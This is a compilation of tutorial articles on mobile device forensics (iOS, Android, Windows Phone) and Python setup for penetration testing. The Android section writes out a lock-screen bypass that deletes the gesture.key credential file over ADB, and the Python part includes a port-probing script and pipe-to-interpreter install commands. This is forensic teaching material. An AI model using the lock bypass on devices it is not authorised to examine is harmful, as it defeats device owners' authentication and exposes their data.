Extracting metadata: Put simply, metadata is data that describes data, or information about information. In general, metadata is hidden, extra information that is generated and embedded automatically in a digital file. The definition of metadata differs depending on the context in which it is used and the community that refers to it; metadata can be considered machine-understandable information, or a record that describes digital records. Metadata can be subdivided into three important types: descriptive (including elements such as author, title, abstract, keywords, and so on), structural (describing how an object is constituted and how the elements are arranged), and administrative (including elements such as date and time of creation, data type, and other technical details).

String dump and analysis: Most digital investigations rely on textual evidence; this is obviously due to the fact that most stored digital data is linguistic, for instance, logged conversations. A lot of important text-based evidence can be gathered while dumping strings from images (smartphone memory dumps), including emails, instant messaging, address books, browsing history, and so on. Most of the currently available digital forensic tools rely on matching and indexing algorithms to search textual evidence at the physical level, so that they search every byte to locate specific text strings.

Encryption versus encoding versus hashing: The important thing to keep in mind is that encoding, encrypting, and hashing are terms that do not mean the same thing at all:

Encoding: This is meant for data usability; it can be reversed using the same algorithm and requires no key.
Encrypting: This is meant for confidentiality and is reversible; depending on the algorithm, it relies on key(s) to encrypt and decrypt.
Hashing: This is meant for data integrity; it is, in theory, not reversible and depends on no keys.

Decompiling and disassembling: These are types of reverse engineering processes that do the opposite of what a compiler and an assembler do:

Decompiler: This translates a compiled binary's low-level code, designed to be computer readable, into human-readable high-level code. The accuracy of decompilers depends on many factors, such as the amount of metadata present in the code being decompiled and the complexity of the code (not in terms of algorithms, but in terms of the sophistication of the high-level code used).
Disassembler: The output of a disassembler is, at some level, dependent on the processor. It maps processor instructions into mnemonics, in contrast to a decompiler's output, which is far more complicated to understand and edit.
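To make the file carving idea concrete, here is a minimal Python sketch (not from the original text) that recovers JPEG images from a raw dump by scanning for the JPEG header and trailer; the input file name memory_dump.dd is a placeholder:

JPEG_HEADER = b'\xff\xd8\xff'   # bytes that open a JPEG stream
JPEG_TRAILER = b'\xff\xd9'      # bytes that close a JPEG stream

def carve_jpegs(path):
    with open(path, 'rb') as f:
        data = f.read()
    carved = []
    start = data.find(JPEG_HEADER)
    while start != -1:
        end = data.find(JPEG_TRAILER, start)
        if end == -1:
            break
        carved.append(data[start:end + 2])       # keep the 2-byte trailer
        start = data.find(JPEG_HEADER, end + 2)  # look for the next header
    return carved

for i, image in enumerate(carve_jpegs('memory_dump.dd')):
    with open('carved_%d.jpg' % i, 'wb') as out:
        out.write(image)

Real carvers such as Scalpel or PhotoRec are far more robust, since they handle fragmentation and validate the carved structures, but header/trailer matching as shown above is the core idea.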
iDevices forensics

Similar to all Apple operating systems, iOS is derived from Mac OS X; thus, iOS uses Hierarchical File System Plus (HFS+) as its primary filesystem. HFS+ replaces the first-developed filesystem, HFS, and is considered an enhanced version of HFS, although the two are still architecturally very similar. The main improvements seen in HFS+ are:

A decrease in disk space usage on large volumes (efficient use of disk space)
Internationally friendly file names (through the use of Unicode instead of MacRoman)
Allowing future systems to use and extend file/folder metadata

HFS+ divides the total space on a volume (a file that contains data and the structure to access this data) into allocation blocks and uses 32-bit fields to identify them; this allows up to 2^32 blocks on a given volume, which simply means that a volume can hold more files. All HFS+ volumes respect a well-defined structure, and each volume contains a volume header, a catalog file, an extents overflow file, an attributes file, an allocation file, and a startup file.
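As a small illustration of working with these structures at a low level, the following Python sketch (an illustrative example, not from the original text) reads the volume header, which starts 1,024 bytes into the volume, and checks its two-byte signature; 'H+' identifies HFS+ and 'HX' identifies the case-sensitive HFSX variant. The image name data_partition.dd is a placeholder:

import struct

def hfs_signature(path):
    with open(path, 'rb') as f:
        f.seek(1024)                 # the volume header starts at offset 1024
        signature, version = struct.unpack('>2sH', f.read(4))
    return signature, version

signature, version = hfs_signature('data_partition.dd')
if signature in ('H+', 'HX'):
    print 'HFS+ volume detected (signature %s, version %d)' % (signature, version)
else:
    print 'Not an HFS+ volume: %r' % signature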
In addition, all Apple iDevices have advanced security built into a combination of hardware and software, which can be categorized according to Apple's official iOS Security Guide as:

System security: Integrated software and hardware platform
Encryption and data protection: Mechanisms implemented to protect data from unauthorized use
Application security: Application sandboxing
Network security: Secure data transmission
Apple Pay: Implementation of secure payments
Internet services: Apple's network of messaging, synchronization, and backup
Device controls: Remotely wiping the device if it is lost or stolen
Privacy controls: Capabilities to control access to geolocation and user data

When dealing with seizure, it is important to turn on Airplane mode and, if the device is unlocked, set auto-lock to never and check whether a passcode was set (Settings | Passcode). If you are dealing with a passcode, try to keep the phone charged if you cannot acquire its content immediately; if no passcode was set, turn off the device.

There are four different acquisition methods when talking about iDevices: Normal or Direct, the ideal case, where you can deal directly with a powered-on device; Logical Acquisition, where acquisition is done using an iTunes backup or a forensic tool that uses the AFC protocol, and which is in general not complete, since emails, the geolocation database, the apps cache folder, and executables are missed; Advanced Logical Acquisition, a technique introduced by Jonathan Zdziarski (http://www.zdziarski.com/blog/) that is no longer possible due to the introduction of iOS 8; and Physical Acquisition, which generates a forensic bit-by-bit image of both the system and data partitions. Before selecting a method (the right choice depends on several parameters), the examiner should answer three important questions: What is the device model? Which iOS version is installed? Is the device passcode protected, and if so, is it a simple or a complex passcode?

Android forensics

Android is an open source, Linux-based operating system. It was first developed by Android Inc. in 2003, acquired by Google in 2005, and unveiled in 2007. The Android operating system, like most operating systems, consists of a stack of software components roughly divided into four main layers and five main sections, as shown in the image at https://upload.wikimedia.org/wikipedia/commons/a/af/Android-System-Architecture.svg; each layer provides different services to the layer above.

Understanding every smartphone OS's security model is a big deal in a forensic context. All vendors and smartphone manufacturers care about securing their users' data, and in most cases the security model implemented can cause a real headache for every forensic examiner; Android is no exception to the rule. Android, as you know, is an open source OS built on the Linux kernel, and it provides an environment offering the ability to run multiple applications simultaneously. Each application is digitally signed and isolated in its very own sandbox, and each application sandbox defines the application's privileges. Above the kernel, all activities have constrained access to the system. Android implements many security components and has many considerations for its various layers; the following figure summarizes the Android security architecture on ARM with TrustZone support.

Without any doubt, lock screens represent the very first starting point in every mobile forensic examination. As with all smartphone OSes, Android offers a way to control access to a given device by requiring user authentication. The problem with recent lock screen implementations in modern operating systems in general, and in Android in particular, since it is the point of interest of this section, is that beyond controlling access to the system user interface and applications, lock screens have been extended with more "fancy" features (showing widgets, switching users on multi-user devices, and so on) and more forensically challenging features, such as unlocking the system keystore to derive the key-encryption key (used, among other things, for the disk encryption key) as well as the credential storage encryption key.

The problem with bypassing lock screens (also called keyguards) is that the applicable techniques are very version and device dependent; thus, there is neither a generalized method nor an always-working technique. The Android keyguard is basically an Android application whose window lives on a high window layer, with the ability to intercept navigation buttons in order to produce the lock effect. Each unlock method (PIN, password, pattern, and face unlock) is a view component implementation hosted by the KeyguardHostView view container class. All of the methods/modes used to secure an Android device are activated by setting the currently selected mode in the SecurityMode enumeration of the KeyguardSecurityModel class. The following is the KeyguardSecurityModel.SecurityMode implementation, as seen in the Android Open Source Project:

    enum SecurityMode {
        Invalid, // NULL state
        None, // No security enabled
        Pattern, // Unlock by drawing a pattern.
        Password, // Unlock by entering an alphanumeric password
        PIN, // Strictly numeric password
        Biometric, // Unlock with a biometric key (e.g. finger print or face unlock)
        Account, // Unlock by entering an account's login and password.
        SimPin, // Unlock by entering a sim pin.
        SimPuk // Unlock by entering a sim puk
    }
Before starting our bypass and lock-cracking techniques, note that dealing with system files or "system-protected" files assumes that the device you are handling meets some requirements, depending on the technique:

Using Android Debug Bridge (ADB)
The device must be rooted
USB debugging should be enabled on the device
Booting into a custom recovery mode
JTAG/chip-off to acquire a physical bit-by-bit copy
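As an illustration of why these requirements matter, one widely documented technique on older Android versions, assuming a rooted device with USB debugging enabled (both are assumptions, and neither is guaranteed in practice), is removing the file that stores the lock pattern hash and rebooting:

adb shell rm /data/system/gesture.key
adb reboot

After the reboot, depending on the version, any pattern (or none at all) is accepted. The same idea applies to password.key for PIN/password locks, though newer Android releases store and protect credentials differently, so this should be treated as a version-dependent example rather than a general method.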
Windows Phone forensics

Based on the Windows NT kernel, Windows Phone 8.x uses the Core System to boot, manage hardware, authenticate, and communicate on networks. The Core System is a minimal Windows system that contains low-level security features and is supplemented by a set of Windows Phone-specific binaries from the Mobile Core to handle phone-specific tasks, which makes it the only architecturally distinct entity (from desktop-based Windows) in Windows Phone. Windows and Windows Phone are completely aligned at the Windows Core System level and run exactly the same code at this level; the shared core actually consists of the Windows Core System and the Mobile Core, where the APIs are the same but the code behind them is tuned to mobile needs.

Similar to most mobile operating systems, Windows Phone has a fairly layered architecture. The kernel and OS layers are mainly provided and supported by Microsoft, but some layers are provided by Microsoft's partners, depending on hardware properties, in the form of a board support package (BSP), which usually consists of a set of drivers and support libraries ensuring low-level hardware interaction and a boot process created by the CPU supplier. Then come the original equipment manufacturers (OEMs) and independent hardware vendors (IHVs), which write the drivers required to support the phone hardware and specific components. The following is a high-level diagram describing the Windows Phone architecture organized by layer and ownership:

There are three main partitions on a Windows Phone that are forensically interesting: the MainOS, Data, and Removable User Data partitions (the latter is not visible in the preceding screenshot, since the Lumia 920 does not support SD cards). As their respective names suggest, the MainOS partition contains all the Windows Phone operating system components, and the Data partition stores all user data, third-party applications, and application states. The Removable User Data partition is considered by Windows Phone to be a separate volume and refers to all data stored on the SD card (on devices that support SD cards). Each of the previously named partitions respects a folder layout, and their root folders are mapped with predefined Access Control Lists (ACLs). Each ACL is in the form of a list of access control entries (ACEs), and each ACE identifies the user account to which it applies (the trustee) and specifies the access rights allowed, denied, or audited for that trustee.

Windows Phone 8.1 is extremely challenging, and different forensic tools and techniques have to be used in order to gather evidence. One of the interesting techniques is side loading, where an agent is deployed to extract contacts and appointments from a WP 8.1 device. To extract phonebook and appointment entries, we will use WP Logical, a contacts and appointments acquisition tool designed to run under Windows Phone 8.1. Once deployed and executed, it will create a folder with the name WPLogical_MDY__HMMSS_PM/AM under the public folder Phone\Pictures, where M=month, D=day, Y=year, H=hour, MM=minutes, and SS=seconds of the extraction date. Inside the created folder, you can find appointments__MDY__HMMSS_PM/AM.html and contacts_MDY__HMMSS_PM/AM.html.

WP Logical will extract the following information (if found) regarding each appointment, starting from 01/01/CurrentYear at 00:00:00 to 31/12/CurrentYear at 00:00:00:

Subject
Location
Organizer
Invitees
Start time (UTC)
Original start time
Duration (in hours)
Sensitivity
Replay time
Is organized by user?
Is canceled?
More details

And the following information about each found contact:

Display name
First name
Middle name
Last name
Phones (types: personal, office, and home, and numbers)
Important dates
Emails (types: personal, office, and home, and numbers)
Websites
Job info
Addresses
Notes
Thumbnail

WP Logical also allows the extraction of some device-related information, such as the phone time zone, the device's friendly name, the Stock Keeping Unit (SKU), and so on. Windows Phone 8.1 is relatively strict regarding application deployment; WP Logical can be deployed in two ways:

Upload the compiled agent to the Windows Store and get it signed by Microsoft; after that, it will be available in the store for download.
Deploy the agent directly to a developer-unlocked device using the Windows Phone Application Deployment utility.

Summary

In this article, we looked at forensics for iOS, Android, and Windows Phone devices. We also looked at some low-level forensic techniques.

Resources for Article:

Further resources on this subject:

Mobile Forensics and Its Challenges [article]
Introduction to Mobile Forensics [article]
Forensics Recovery [article]


Python Scripting Essentials

Packt
17 May 2016
15 min read
In this article by Rejah Rehim, author of the book Mastering Python Penetration Testing, we will cover:

Setting up the scripting environment in different operating systems
Installing third-party Python libraries
Working with virtual environments
Python language basics

(For more resources related to this topic, see here.)

Python is still the leading language in the world of penetration testing (pentesting) and information security. Python-based tools include all kinds of tools used for inputting massive amounts of random data to find errors and security loopholes, proxies, and even exploit frameworks. If you are interested in tinkering with pentesting tasks, Python is the best language to learn because of its large number of reverse engineering and exploitation libraries.

Over the years, Python has received numerous updates and upgrades. For example, Python 2 was released in 2000 and Python 3 in 2008. Unfortunately, Python 3 is not backward compatible; hence, most of the programs written in Python 2 will not work in Python 3. Even though Python 3 was released in 2008, most of the libraries and programs still use Python 2. To do better penetration testing, the tester should be able to read, write, and rewrite Python scripts.

As a scripting language, Python has been the preferred choice of security experts for developing security toolkits. Its human-readable code, modular design, and large number of libraries provide a starting point for security experts and researchers to create sophisticated tools with it. Python comes with a vast standard library that accommodates almost everything from simple I/O to platform-specific API calls. Many of the default and user-contributed libraries and modules can help us in penetration testing by building tools to achieve interesting tasks.

Setting up the scripting environment

Your scripting environment is basically the computer you use for your daily work, combined with all the tools in it that you use to write and run Python programs. The best system to learn on is the one you are using right now. This section will help you configure the Python scripting environment on your computer so that you can create and run your own programs.

If you are using Mac OS X or Linux on your computer, you may have a Python interpreter preinstalled. To find out if you have one, open a terminal and type python. You will probably see something like this:

$ python
Python 2.7.6 (default, Mar 22 2014, 22:59:56)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

From the preceding output, we can see that Python 2.7.6 is installed on this system. By issuing python in your terminal, you started the Python interpreter in interactive mode. Here, you can play around with Python commands; what you type will run, and you'll see the output immediately.

You can use your favorite text editor to write your Python programs. If you do not have one, try installing Geany or Sublime Text; either should be perfect for you. These are simple editors that offer a straightforward way to write as well as run your Python programs. In Geany, the output is shown in a separate terminal window, whereas Sublime Text uses an embedded terminal window. Sublime Text is not free, but it has a flexible trial policy that allows you to use the editor without any restriction. It is one of the few cross-platform text editors that is quite apt for beginners while offering a full range of functions for professionals.
Setting up in Linux

Linux systems are built in a way that makes it smooth for users to get started with Python programming. Most Linux distributions already have Python installed. For example, the latest versions of Ubuntu and Fedora come with Python 2.7, and the latest versions of Red Hat Enterprise Linux (RHEL) and CentOS come with Python 2.6. Just for the record, you might want to check it.

If it is not installed, the easiest way to install Python is to use the default package manager of your distribution, such as apt-get, yum, and so on. Install Python by issuing the following commands in the terminal.

For Debian / Ubuntu Linux / Kali Linux users:

sudo apt-get install python2

For Red Hat / RHEL / CentOS Linux users:

sudo yum install python

To install Geany, leverage your distribution's package manager. For Debian / Ubuntu Linux / Kali Linux users:

sudo apt-get install geany geany-common

For Red Hat / RHEL / CentOS Linux users:

sudo yum install geany

Setting up in Mac

Even though Macintosh is a good platform to learn Python on, many people using Macs actually run some Linux distribution or other on their computer, or run Python within a virtual Linux machine. The latest version of Mac OS X, Yosemite, comes with Python 2.7 preinstalled. Once you verify that it is working, install Sublime Text.

For Python to run on your Mac, you have to install GCC, which can be obtained by downloading Xcode or the smaller Command Line Tools package. Also, we need to install Homebrew, a package manager. To install Homebrew, open Terminal and run the following:

$ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

After installing Homebrew, you have to insert the Homebrew directory into your PATH environment variable. You can do this by including the following line in your ~/.profile file:

export PATH=/usr/local/bin:/usr/local/sbin:$PATH

Now that we are ready to install Python 2.7, run the following command in your terminal, which will do the rest:

$ brew install python

To install Sublime Text, go to Sublime Text's download page at http://www.sublimetext.com/3 and click on the OS X link. This will get you the Sublime Text installer for your Mac.

Setting up in Windows

Windows does not have Python preinstalled. To check whether it is installed, open a command prompt, type the word python, and press Enter. In most cases, you will get a message that says Windows does not recognize python as a command.

We have to download an installer that will set up Python for Windows. Then, we have to install and configure Geany to run Python programs. Go to Python's download page at https://www.python.org/downloads/windows/ and download the Python 2.7 installer that is compatible with your system. If you are not aware of your operating system's architecture, then download the 32-bit installer, which will work on both architectures; the 64-bit installer will only work on 64-bit systems.

To install Geany, go to Geany's download page via http://www.geany.org/Download/Releases and download the full installer variant, which has the description Full Installer including GTK 2.16. By default, Geany doesn't know where Python resides on your system, so we need to configure it manually. For this, write a Hello World program in Geany, save it anywhere on your system as hello.py, and run it.

There are three methods you can use to run a Python program in Geany:

Select Build | Execute.
Press F5.
Click the icon with three gears on it.

When you have a running hello.py program in Geany, go to Build | Set Build Commands.
Then, enter the python commands option with C:\Python27\python -m py_compile "%f" and the execute command with C:\Python27\python "%f". Now, you can run your Python programs while coding in Geany.

It is recommended to run a Kali Linux distribution as a virtual machine and use this as your scripting environment. Kali Linux comes with a number of tools preinstalled and is based on Debian Linux, so you'll also be able to install a wide variety of additional tools and libraries. Also, some of the libraries will not work properly on Windows systems.

Installing third-party libraries

We will be using many Python libraries, and this section will help you install and use third-party libraries.

Setuptools and pip

One of the most useful pieces of third-party Python software is Setuptools. With Setuptools, you can download and install any compliant Python library with a single command. The best way to install Setuptools on any system is to download the ez_setup.py file from https://bootstrap.pypa.io/ez_setup.py and run this file with your Python installation.

In Linux, run this in a terminal with the correct path to the ez_setup.py script:

sudo python path/to/ez_setup.py

For Windows 8, or older versions of Windows with PowerShell 3 installed, start PowerShell with administrative privileges and run this command in it:

> (Invoke-WebRequest https://bootstrap.pypa.io/ez_setup.py).Content | python -

For Windows systems without PowerShell 3 installed, download the ez_setup.py file from the link provided previously using your web browser and run that file with your Python installation.

pip is a package management system used to install and manage software packages written in Python. After the successful installation of Setuptools, you can install pip by simply opening a command prompt and running the following:

$ easy_install pip

Alternatively, you can also install pip using your distribution's default package manager.

On Debian, Ubuntu, and Kali Linux:

sudo apt-get install python-pip

On Fedora:

sudo yum install python-pip

Now, you can run pip from the command line. Try installing a package with pip:

$ pip install packagename

Working with virtual environments

A virtual environment helps separate the dependencies required for different projects; by working inside a virtual environment, it also helps to keep our global site-packages directory clean.

Using virtualenv and virtualenvwrapper

virtualenv is a Python module that helps to create isolated Python environments for each of our scripting experiments; it creates a folder with all the necessary executable files and modules for a basic Python project. You can install virtualenv with the following command:

sudo pip install virtualenv

To create a new virtual environment, create a folder and enter it from the command line:

$ cd your_new_folder
$ virtualenv name-of-virtual-environment

This will initiate a folder with the provided name in your current working directory, containing all the Python executable files and the pip library, which will then help install other packages in your virtual environment. You can select a Python interpreter of your choice by providing more parameters, as in the following command:

$ virtualenv -p /usr/bin/python2.7 name-of-virtual-environment

This will create a virtual environment with Python 2.7. We have to activate the virtual environment before we start using it:

$ source name-of-virtual-environment/bin/activate

Now, on the left-hand side of the command prompt, the name of the active virtual environment will appear.
Any package that you install inside this prompt using pip will belong to the active virtual environment, which is isolated from all other virtual environments and the global installation. You can deactivate and exit the current virtual environment using this command:

$ deactivate

virtualenvwrapper provides a better way to use virtualenv. It also organizes all the virtual environments in one place. To install it, we can use pip, but let's make sure we have installed virtualenv before installing virtualenvwrapper.

Linux and OS X users can install it with the following method:

$ pip install virtualenvwrapper

Also, add these three lines to your shell startup file, such as .bashrc or .profile:

export WORKON_HOME=$HOME/.virtualenvs
export PROJECT_HOME=$HOME/Devel
source /usr/local/bin/virtualenvwrapper.sh

This will set the Devel folder in your home directory as the location of your virtual environment projects. For Windows users, there is another package, virtualenvwrapper-win, which can also be installed with pip:

pip install virtualenvwrapper-win

Create a virtual environment with virtualenvwrapper:

$ mkvirtualenv your-project-name

This creates a folder with the provided name inside ~/Envs. To activate this environment, we can use the workon command:

$ workon your-project-name

These two commands can be combined into a single one, as follows:

$ mkproject your-project-name

We can deactivate the virtual environment with the same deactivate command as in virtualenv. To delete a virtual environment, we can use the following command:

$ rmvirtualenv your-project-name

Python language essentials

In this section, we will go through the ideas of variables, strings, data types, networking, and exception handling. If you are an experienced programmer, this section will be just a summarization of what you already know about Python.

Variables and types

Python is brilliant in the case of variables: variables point to data stored in a memory location. This memory location may contain different values, such as integers, real numbers, Booleans, strings, lists, and dictionaries. Python interprets and declares variables when you set some value to a variable. For example, if we set:

a = 1 and b = 2

Then, we print the sum of these two variables with:

print (a+b)

The result will be 3, as Python will figure out that both a and b are numbers. However, if we had assigned:

a = "1" and b = "2"

Then, the output will be 12, since both a and b will be considered as strings. Here, we do not have to declare variables or their types before using them, as each variable is an object. The type() method can be used to get the variable type.

Strings

As in any other programming language, strings are one of the important things in Python. They are immutable, so they cannot be changed once they are defined. There are many Python methods that can modify strings; they do nothing to the original one, but create a copy and return it after modifications. Strings can be delimited with single quotes, double quotes, or, in the case of multiple lines, triple quotes. We can use the \ character to escape additional quotes that come inside a string.
Commonly used string methods are:

string.count('x'): This returns the number of occurrences of 'x' in the string
string.find('x'): This returns the position of character 'x' in the string
string.lower(): This converts the string into lowercase
string.upper(): This converts the string into uppercase
string.replace('a', 'b'): This replaces all a with b in the string

Also, we can get the number of characters, including white spaces, in a string with the len() method:

#!/usr/bin/python
a = "Python"
b = "Python\n"
c = "Python "
print len(a)
print len(b)
print len(c)

You can read more about string functions at https://docs.python.org/2/library/string.html.

Lists

Lists allow us to store more than one variable and provide a better method for sorting arrays of objects in Python. They also have methods that help to manipulate the values inside them:

list = [1,2,3,4,5,6,7,8]
print (list[1])

This will print 2, as Python indexing starts from 0. To print out the whole list:

list = [1,2,3,4,5,6,7,8]
for x in list:
    print (x)

This will loop through all the elements and print them. Useful list methods are:

.append(value): This appends an element at the end of the list
.count('x'): This gets the number of 'x' in the list
.index('x'): This returns the index of 'x' in the list
.insert('y','x'): This inserts 'x' at location 'y'
.pop(): This returns the last element and also removes it from the list
.remove('x'): This removes the first 'x' from the list
.reverse(): This reverses the elements in the list
.sort(): This sorts the list alphabetically or numerically in ascending order

Dictionaries

A Python dictionary is a storage method for key:value pairs. In Python, dictionaries are enclosed in curly braces, {}. For example:

dictionary = {'item1': 10, 'item2': 20}
print(dictionary['item2'])

This will output 20. We cannot create multiple values with the same key; this will overwrite the previous value of the duplicate key. Operations on dictionaries are unique; slicing is not supported in dictionaries.

We can combine two distinct dictionaries into one by using the update method. Also, the update method will merge existing elements if they conflict:

a = {'apples': 1, 'mango': 2, 'orange': 3}
b = {'orange': 4, 'lemons': 2, 'grapes ': 4}
a.update(b)
print a

This will return:

{'mango': 2, 'apples': 1, 'lemons': 2, 'grapes ': 4, 'orange': 4}

To delete elements from a dictionary, we can use the del method:

del a['mango']
print a

This will return:

{'apples': 1, 'lemons': 2, 'grapes ': 4, 'orange': 4}

Networking

Sockets are the basic blocks behind all network communications by a computer. All network communications go through a socket, so sockets are the virtual endpoints of any communication channel between two applications, which may reside on the same or on different computers. The socket module in Python provides us with a better way to create network connections. To make use of this module, we have to import it in our script:

import socket
socket.setdefaulttimeout(3)
newSocket = socket.socket()
newSocket.connect(("localhost",22))
response = newSocket.recv(1024)
print response

This script will get the response header (the service banner) from the server.
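Building on the same socket module, here is a small sketch (an illustrative example, not from the original text) that probes a handful of common ports on a host; the host name and port list are placeholders:

import socket

socket.setdefaulttimeout(2)

for port in [21, 22, 80, 443]:
    s = socket.socket()
    # connect_ex returns 0 when the connection succeeds, an errno otherwise
    result = s.connect_ex(("localhost", port))
    print "Port %d: %s" % (port, "open" if result == 0 else "closed/filtered")
    s.close()

Using connect_ex instead of connect avoids having to catch an exception for every closed port, which keeps the loop compact.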
Handling exceptions

Even though we write syntactically correct scripts, there will be some errors while executing them, so we will have to handle the errors properly. The simplest way to handle an exception in Python is with try-except. Try dividing a number by zero in your Python interpreter:

>>> 10/0
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ZeroDivisionError: integer division or modulo by zero

So, we can rewrite this with a try-except block:

try:
    answer = 10/0
except ZeroDivisionError, e:
    answer = e
print answer

This will return the error integer division or modulo by zero.

Summary

Now, we have an idea about the basic installations and configurations that we have to do before coding. Also, we have gone through the basics of Python, which may help us speed up our scripting.

Resources for Article:

Further resources on this subject:

Exception Handling in MySQL for Python [article]
An Introduction to Python Lists and Dictionaries [article]
Python LDAP applications - extra LDAP operations and the LDAP URL library [article]

Mobile Forensics and Its Challenges

Packt
25 Apr 2016
10 min read
In this article by Heather Mahalik and Rohit Tamma, authors of the book Practical Mobile Forensics, Second Edition, we will cover the following topics:

Introduction to mobile forensics
Challenges in mobile forensics

(For more resources related to this topic, see here.)

Why do we need mobile forensics?

In 2015, there were more than 7 billion mobile cellular subscriptions worldwide, up from less than 1 billion in 2000, says the International Telecommunication Union (ITU). The world is witnessing technology and user migration from desktops to mobile phones. The following figure, sourced from statista.com, shows the actual and estimated growth of smartphones from the year 2009 to 2018.

Growth of smartphones from 2009 to 2018 in million units

Gartner Inc. reports that global mobile data traffic reached 52 million terabytes (TB) in 2015, an increase of 59 percent from 2014, and the rapid growth is set to continue through 2018, when mobile data levels are estimated to reach 173 million TB.

Smartphones of today, such as the Apple iPhone, the Samsung Galaxy series, and BlackBerry phones, are compact forms of computers with high performance, huge storage, and enhanced functionality. Mobile phones are the most personal electronic devices that users access. They are used to perform simple communication tasks, such as calling and texting, while still providing support for Internet browsing, e-mail, taking photos and videos, creating and storing documents, identifying locations with GPS services, and managing business tasks. As new features and applications are incorporated into mobile phones, the amount of information stored on the devices is continuously growing. Mobile phones have become portable data carriers, and they keep track of all your moves.

With the increasing prevalence of mobile phones in people's daily lives and in crime, data acquired from phones becomes an invaluable source of evidence for investigations relating to criminal, civil, and even high-profile cases. It is rare to conduct a digital forensic investigation that does not include a phone. Mobile device call logs and GPS data were used to help solve the attempted bombing in Times Square, New York, in 2010. The details of the case can be found at http://www.forensicon.com/forensics-blotter/cell-phone-email-forensics-investigation-cracks-nyc-times-square-car-bombing-case/.

The science behind recovering digital evidence from mobile phones is called mobile forensics. Digital evidence is defined as information and data that is stored on, received by, or transmitted by an electronic device and that is used for investigations. Digital evidence encompasses any and all digital data that can be used as evidence in a case.

Mobile forensics

Digital forensics is a branch of forensic science focusing on the recovery and investigation of raw data residing in electronic or digital devices. The goal of the process is to extract and recover any information from a digital device without altering the data present on the device. Over the years, digital forensics has grown along with the rapid growth of computers and various other digital devices. There are various branches of digital forensics based on the type of digital device involved, such as computer forensics, network forensics, mobile forensics, and so on. Mobile forensics is the branch of digital forensics related to the recovery of digital evidence from mobile devices.
Forensically sound is a term used extensively in the digital forensics community to qualify and justify the use of a particular forensic technology or methodology. The main principle for a sound forensic examination of digital evidence is that the original evidence must not be modified. This is extremely difficult with mobile devices. Some forensic tools require a communication vector with the mobile device, so standard write protection will not work during forensic acquisition. Other forensic acquisition methods may involve removing a chip or installing a bootloader on the mobile device prior to extracting data for forensic examination. In cases where the examination or data acquisition is not possible without changing the configuration of the device, the procedure and the changes must be tested, validated, and documented. Following proper methodology and guidelines is crucial in examining mobile devices, as it yields the most valuable data. As with any evidence gathering, not following the proper procedure during the examination can result in the loss or damage of evidence, or render it inadmissible in court.

The mobile forensics process is broken into three main categories: seizure, acquisition, and examination/analysis. Forensic examiners face some challenges while seizing a mobile device as a source of evidence. At the crime scene, if the mobile device is found switched off, the examiner should place the device in a Faraday bag to prevent changes should the device automatically power on. As shown in the following figure, Faraday bags are specifically designed to isolate the phone from the network.

A Faraday bag (image courtesy of http://www.amazon.com/Black-Hole-Faraday-Bag-Isolation/dp/B0091WILY0)

If the phone is found switched on, switching it off has a lot of concerns attached to it. If the phone is locked by a PIN or password, or is encrypted, the examiner will be required to bypass the lock or determine the PIN to access the device. Mobile phones are networked devices and can send and receive data through different sources, such as telecommunication systems, Wi-Fi access points, and Bluetooth, so if the phone is in a running state, a criminal can securely erase the data stored on the phone by executing a remote wipe command. When a phone is switched on, it should be placed in a Faraday bag. If possible, prior to placing the mobile device in the Faraday bag, disconnect it from the network to protect the evidence by enabling flight mode and disabling all network connections (Wi-Fi, GPS, hotspots, and so on). This will also preserve the battery, which will drain while in a Faraday bag, and protect against leaks in the Faraday bag.

Once the mobile device is seized properly, the examiner may need several forensic tools to acquire and analyze the data stored on the phone. Mobile phones are dynamic systems that present a lot of challenges to the examiner in extracting and analyzing digital evidence. The rapid increase in the number of different kinds of mobile phones from different manufacturers makes it difficult to develop a single process or tool to examine all types of devices. Mobile phones are continuously evolving as existing technologies progress and new technologies are introduced. Furthermore, each mobile is designed with a variety of embedded operating systems. Hence, special knowledge and skills are required from forensic experts to acquire and analyze the devices.
Challenges in mobile forensics

One of the biggest forensic challenges when it comes to the mobile platform is the fact that data can be accessed, stored, and synchronized across multiple devices. As the data is volatile and can be quickly transformed or deleted remotely, more effort is required for the preservation of this data. Mobile forensics is different from computer forensics and presents unique challenges to forensic examiners. Law enforcement and forensic examiners often struggle to obtain digital evidence from mobile devices. The following are some of the reasons:

Hardware differences: The market is flooded with different models of mobile phones from different manufacturers. Forensic examiners may come across different types of mobile models, which differ in size, hardware, features, and operating system. Also, with a short product development cycle, new models emerge very frequently. As the mobile landscape changes with each passing day, it is critical for the examiner to adapt to all the challenges and remain updated on mobile device forensic techniques across various devices.

Mobile operating systems: Unlike personal computers, where Windows has dominated the market for years, mobile devices use a much wider variety of operating systems, including Apple's iOS, Google's Android, RIM's BlackBerry OS, Microsoft's Windows Mobile, HP's webOS, Nokia's Symbian OS, and many others. Even within these operating systems, there are several versions, which makes the task of the forensic investigator even more difficult.

Mobile platform security features: Modern mobile platforms contain built-in security features to protect user data and privacy. These features act as a hurdle during forensic acquisition and examination. For example, modern mobile devices come with default encryption mechanisms from the hardware layer to the software layer. The examiner might need to break through these encryption mechanisms to extract data from the devices.

Lack of resources: As mentioned earlier, with the growing number of mobile phones, the tools required by a forensic examiner also increase. Forensic acquisition accessories, such as USB cables, batteries, and chargers for different mobile phones, have to be maintained in order to acquire those devices.

Preventing data modification: One of the fundamental rules in forensics is to make sure that data on the device is not modified. In other words, any attempt to extract data from the device should not alter the data present on that device. But this is practically not possible with mobiles, because just switching on a device can change the data on it. Even if a device appears to be in an off state, background processes may still run. For example, in most mobiles, the alarm clock still works even when the phone is switched off. A sudden transition from one state to another may result in the loss or modification of data.

Anti-forensic techniques: Anti-forensic techniques, such as data hiding, data obfuscation, data forgery, and secure wiping, make investigations of digital media more difficult.

Dynamic nature of evidence: Digital evidence may be easily altered, either intentionally or unintentionally. For example, browsing an application on the phone might alter the data stored by that application on the device.

Accidental reset: Mobile phones provide features to reset everything. Resetting the device accidentally while examining it may result in the loss of data.
Device alteration: The possible ways to alter devices range from moving application data and renaming files to modifying the manufacturer's operating system. In this case, the expertise of the suspect should be taken into account.

Passcode recovery: If the device is protected with a passcode, the forensic examiner needs to gain access to the device without damaging the data on it. While there are techniques to bypass the screen lock, they may not always work on all versions.

Communication shielding: Mobile devices communicate over cellular networks, Wi-Fi networks, Bluetooth, and infrared. As device communication might alter the device data, the possibility of further communication should be eliminated after seizing the device.

